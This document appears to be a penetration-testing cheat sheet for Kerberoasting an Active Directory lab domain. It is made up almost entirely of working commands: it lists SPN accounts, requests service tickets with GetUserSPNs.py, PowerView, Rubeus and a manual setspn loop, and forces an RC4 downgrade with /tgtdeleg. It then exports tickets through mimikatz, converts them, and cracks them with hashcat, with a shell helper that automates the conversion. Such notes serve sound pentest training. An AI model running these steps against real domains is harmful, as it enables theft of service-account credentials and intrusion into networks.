🔥Kerberoasting

Linux

Kerberoasting with GetUserSPNs.py

  • Listing SPN accounts (prompts for forend's password; without -request nothing is requested from the DC yet):

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
  • To request the TGS for a single account (the output line is already in the $krb5tgs$ format that hashcat and john accept):

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Or pass -request to pull a ticket for every SPN account at once, and -outputfile <file> to write the hashes straight to disk.

Windows

Automated

Powerview

  • To import PowerView and list every user with an SPN set (the Kerberoastable accounts)

Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
  • Exporting all tickets to a CSV file

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
  • Viewing it

cat .\ilfreight_tgs.csv

Rubeus

  • Check options

.\Rubeus.exe
  • To check stats (number of Kerberoastable accounts, their supported encryption types and password-last-set years) without requesting any tickets:

.\Rubeus.exe kerberoast /stats
  • To get hashes (admincount=1 narrows the LDAP query to high-value accounts; /nowrap prints each hash on a single line for copy-paste):

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
  • If the target account supports AES, the DC returns an AES ticket (etype 17/18), which cracks far slower than RC4. The /tgtdeleg flag tricks the request into asking for RC4 (etype 23) instead:

.\Rubeus.exe kerberoast /nowrap /tgtdeleg

This trick does not work against a Windows Server 2019 domain controller, which returns a ticket at the highest encryption type the account supports regardless. Check the number after $krb5tgs$ in the output before choosing a hashcat mode: 13100 for 23, 19600 for 17, 19700 for 18.

Manual

  • Enumerating SPNs:

setspn.exe -Q */*
  • Targeting a single user (loads the .NET Kerberos client and requests a TGS for that SPN into the current session's ticket cache):

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
  • Retrieving all tickets (one request per SPN that setspn returns, computer accounts included, so this is noisier than targeting a single user):

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
  • Extracting the requested tickets from memory with mimikatz (base64 /out:true prints each ticket as a base64 blob instead of writing .kirbi files to disk):

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export  
  • Now to crack, paste the base64 blob into a file, strip the newlines and decode it back into a .kirbi:

echo "<base64 blob>" | tr -d \\n > encoded_file

base64 -d encoded_file > sqldev.kirbi

Convert the .kirbi with kirbi2john.py (shipped in John the Ripper's run directory), then rewrite its $krb5tgs$<name>:<rest> line into hashcat's $krb5tgs$23$*<name>*$<rest> layout:

kirbi2john.py sqldev.kirbi > crack_file

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

Now run the output through hashcat (mode 13100 is for etype 23; use 19600 or 19700 if the ticket came back as AES etype 17 or 18):

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
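As an added example (not part of the original notes), the conversion step above wrapped in two small POSIX shell helpers: one applies the same sed rewrite to a kirbi2john-style line, the other picks the hashcat mode from the etype in a hashcat-format line, so an AES ticket is not fed to mode 13100 by mistake. The sample line and its hex values are constructed placeholders, not a real ticket.

```shell
#!/bin/sh
# Constructed sample in kirbi2john's $krb5tgs$<name>:<checksum>$<edata> shape.
# The hex is a placeholder, not a real encrypted ticket.
SAMPLE_KIRBI2JOHN='$krb5tgs$sqldev:deadbeefdeadbeefdeadbeefdeadbeef$0123456789abcdef0123456789abcdef'

# to_hashcat: stdin = kirbi2john output, stdout = hashcat -m 13100 layout
# ($krb5tgs$23$*<name>*$<checksum>$<edata>). Same sed as the notes above.
to_hashcat() {
    sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
}

# hashcat_mode: $1 = one hashcat-format line; prints the -m value that matches
# the etype embedded after $krb5tgs$, fails on anything unexpected.
hashcat_mode() {
    case "$1" in
        '$krb5tgs$23$'*) echo 13100 ;;   # RC4-HMAC
        '$krb5tgs$17$'*) echo 19600 ;;   # AES128-CTS-HMAC-SHA1-96
        '$krb5tgs$18$'*) echo 19700 ;;   # AES256-CTS-HMAC-SHA1-96
        *) echo "unrecognised etype in: $1" >&2; return 1 ;;
    esac
}

# Usage: convert the sample, then print the hashcat mode to use for it.
converted=$(printf '%s\n' "$SAMPLE_KIRBI2JOHN" | to_hashcat)
printf '%s\n' "$converted"
hashcat_mode "$converted"
```

Run the converted file with `hashcat -m "$(hashcat_mode "$(head -1 sqldev_tgs_hashcat)")" sqldev_tgs_hashcat wordlist` to pick the mode automatically; the sed rewrite only ever labels a line as etype 23, so the mode check is meaningful for hashes that already carry their etype, such as Rubeus or GetUserSPNs.py output.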
